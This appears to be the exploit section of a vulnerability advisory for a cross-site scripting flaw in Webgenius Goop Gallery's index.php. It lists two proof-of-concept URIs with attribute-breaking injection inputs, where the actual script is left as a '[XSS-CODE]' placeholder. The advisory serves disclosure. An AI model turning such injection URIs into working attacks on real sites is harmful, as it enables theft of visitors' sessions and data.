Webgenius Goop Gallery Index.PHP Cross-Site Scripting Vulnerability

info
discussion
exploit
solution
references

Webgenius Goop Gallery Index.PHP Cross-Site Scripting Vulnerability

To exploit this issue, an attacker must entice an unsuspecting victim into following a malicious URI.

The following proof-of-concept URIs are available:

http://www.example.com/goopgallery/index.php?next=%BB&gallery=demo+gallery+1I=Bunny.JPG">[XSS-CODE]
http://www.example.com/goopgallery/index.php?gallery=demo+gallery+1I=Bunny.JPG">[XSS-CODE]